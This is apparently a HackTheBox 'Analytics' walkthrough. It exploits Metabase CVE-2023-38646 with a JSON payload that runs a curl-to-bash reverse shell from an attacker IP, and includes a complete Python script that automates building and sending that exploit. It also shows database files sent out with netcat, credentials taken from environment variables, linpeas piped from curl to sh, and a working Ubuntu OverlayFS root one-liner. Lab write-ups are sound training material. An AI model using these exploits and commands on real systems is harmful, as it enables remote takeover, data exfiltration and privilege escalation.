Analytics

Recon

![[Labs/HackTheBox/Seasonal/Season 3/Analytics/nmap_scan.log styled]]

HTTP (80)

![[Labs/HackTheBox/Machines/Analytics/images/Writeup.png]]

Enumerate subdomains:

└─$ domain='analytical.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
       v2.1.0-dev
data                    [Status: 200, Size: 77858, Words: 3574, Lines: 28, Duration: 153ms]
:: Progress: [4989/4989] :: Job [1/1] :: 564 req/sec :: Duration: [0:00:09] :: Errors: 0 ::

Metabase is running on this subdomain.

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-1.png]]

Application version is disclosed in the source: v0.46.6

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-2.png]]

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)
CVE-2023-38646 PoC

The PoC didn't work for me for some reason (error: "Vector arg to map conj must be a pair"), so it must be related to the base64 blob and bash.

I just used curl to get the shell, with this request body:

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details":{
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {curl,10.10.14.42/rev}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
               },
        "name": "test",
        "engine": "h2"
    }
}
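As an added example (not the author's code and not the linked PoC), the following Python builds the same request body programmatically, so the callback host and command can be swapped without hand-editing the H2 connection string. It assumes two facts from the public CVE-2023-38646 write-up that this page does not show: the setup token is read from the unauthenticated GET /api/session/properties, and the body is POSTed to /api/setup/validate. The sample session-properties response is constructed, and the host name data.analytical.htb used in the commented call is a guess based on the fuzzed subdomain.

```python
import json
import urllib.request
from typing import Optional, Sequence

# Constructed sample of GET /api/session/properties (trimmed). A non-null
# "setup-token" on an already-configured instance is the precondition for
# CVE-2023-38646: it authorises the unauthenticated /api/setup/validate call.
SAMPLE_SESSION_PROPERTIES = json.dumps({
    "setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "version": {"tag": "v0.46.6"},
})


def extract_setup_token(session_properties_json: str) -> Optional[str]:
    """Return the setup-token from a /api/session/properties body, or None if absent."""
    return json.loads(session_properties_json).get("setup-token")


def braced(argv: Sequence[str]) -> str:
    """Encode argv as a space-free bash brace expansion, e.g. {curl,10.10.14.42/rev}.

    java.lang.Runtime.exec(String) tokenises its argument on whitespace, so a
    shell pipeline with spaces would be split into bogus arguments. Bash's brace
    expansion turns {a,b} back into the two words 'a b' once bash -c runs it.
    """
    for arg in argv:
        if any(c in arg for c in " \t\n,{}"):
            raise ValueError(f"argument {arg!r} would break brace expansion")
    if len(argv) == 1:
        return argv[0]  # a single word has no spaces and needs no expansion
    return "{" + ",".join(argv) + "}"


def download_and_run(stage_url: str, shell: Sequence[str] = ("bash", "-i")) -> str:
    """Build the 'bash -c {curl,URL}|{bash,-i}' stager used in the payload above."""
    return "bash -c " + braced(["curl", stage_url]) + "|" + braced(shell)


def h2_connection_string(java_exec_arg: str) -> str:
    """H2 JDBC connection string of the same shape as the page's payload.

    The trigger body is JavaScript that H2 compiles and runs when the
    INFORMATION_SCHEMA.TABLES query fires during connection validation, so
    Runtime.exec runs with the privileges of the Metabase process.
    """
    if "'" in java_exec_arg:
        raise ValueError("command must not contain single quotes")
    js = "java.lang.Runtime.getRuntime().exec('" + java_exec_arg + "')"
    return (
        "zip:/app/metabase.jar!/sample-database.db;"
        "MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;"
        "CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES "
        "AS $$//javascript\n" + js + "\n$$--=x"
    )


def build_payload(setup_token: str, java_exec_arg: str) -> dict:
    """JSON body for POST /api/setup/validate, mirroring the curl body above."""
    return {
        "token": setup_token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": h2_connection_string(java_exec_arg),
                "advanced-options": False,
                "ssl": True,
            },
            "name": "test",
            "engine": "h2",
        },
    }


def send_payload(base_url: str, payload: dict) -> int:
    """POST the payload to /api/setup/validate and return the HTTP status.

    Network call; raises urllib.error.HTTPError on a 4xx/5xx response.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/setup/validate",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    token = extract_setup_token(SAMPLE_SESSION_PROPERTIES)
    stager = download_and_run("10.10.14.42/rev")  # attacker host from the writeup
    print(json.dumps(build_payload(token, stager), indent=2))
    # Against a live target (hypothetical host name), with a listener waiting:
    # send_payload("http://data.analytical.htb", build_payload(token, stager))
```

The braced() check is the part worth keeping: a comma, brace or space inside the callback URL silently produces a different command than intended, and that is easier to catch here than by staring at a stuck listener.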

The application database lives in the /metabase.db directory, but sqlite3 isn't installed in the container:

3d6ddc86c8c7:/$ sqlite3 metabase.db .dump
bash: sqlite3: command not found

Download via netcat (with a listener such as nc -lvnp 4444 > metabase.db.mv.db on the attacker side for each file):

3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.mv.db
3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.trace.db

The metabase.db.mv.db file is an H2 database file; DBeaver can be used to open it. I don't think the password is crackable, so I'm going to avoid it for now.

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-3.png]]

Environment variables hold interesting data!

3d6ddc86c8c7:/metabase.db$ env
...
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3d6ddc86c8c7
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
...

SSH

Creds: metalytics:An4lytics_ds20223#

└─$ sshpass -p 'An4lytics_ds20223#' ssh metalytics@analytical.htb
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)

User.txt

metalytics@analytics:~$ cat user.txt
43e261df0ac451cadc5cf55a4f543639

Privilege Escalation

Linpeas shows nothing interesting.

metalytics@analytics:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.sh
...

Since this is a retired box, HTB suggests checking the kernel version. The box was released on 07 Oct 2023, so there's probably some kernel exploit.

metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy

Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)
CVE-2023-2640-CVE-2023-32629

The one-liner below exploits the Ubuntu OverlayFS bug: inside an unprivileged user and mount namespace (unshare -rm) a copy of python3 is placed in the lower directory and given the cap_setuid file capability, an overlay is mounted on top of it, and touch m/* forces a copy-up into the upper directory. The affected Ubuntu kernels write the file capability onto the upper copy without checking that the caller is privileged in the parent namespace, so u/python3 carries cap_setuid outside the namespace and can call setuid(0). Note that the resulting shell keeps gid=1000 because only setuid(0) is called; add os.setgid(0) if you want root's group as well.

metalytics@analytics:~$ cd `mktemp -d`
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"

uid=0(root) gid=0(root) groups=0(root)

metalytics@analytics:/tmp/tmp.J24NI1yLfM$ u/python3 -c $'import os;os.setuid(0);os.system("/bin/bash")'
root@analytics:/tmp/tmp.J24NI1yLfM# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)

Root.txt

root@analytics:/root# cat root.txt
f4730b8375b50900c99246cf7471f399
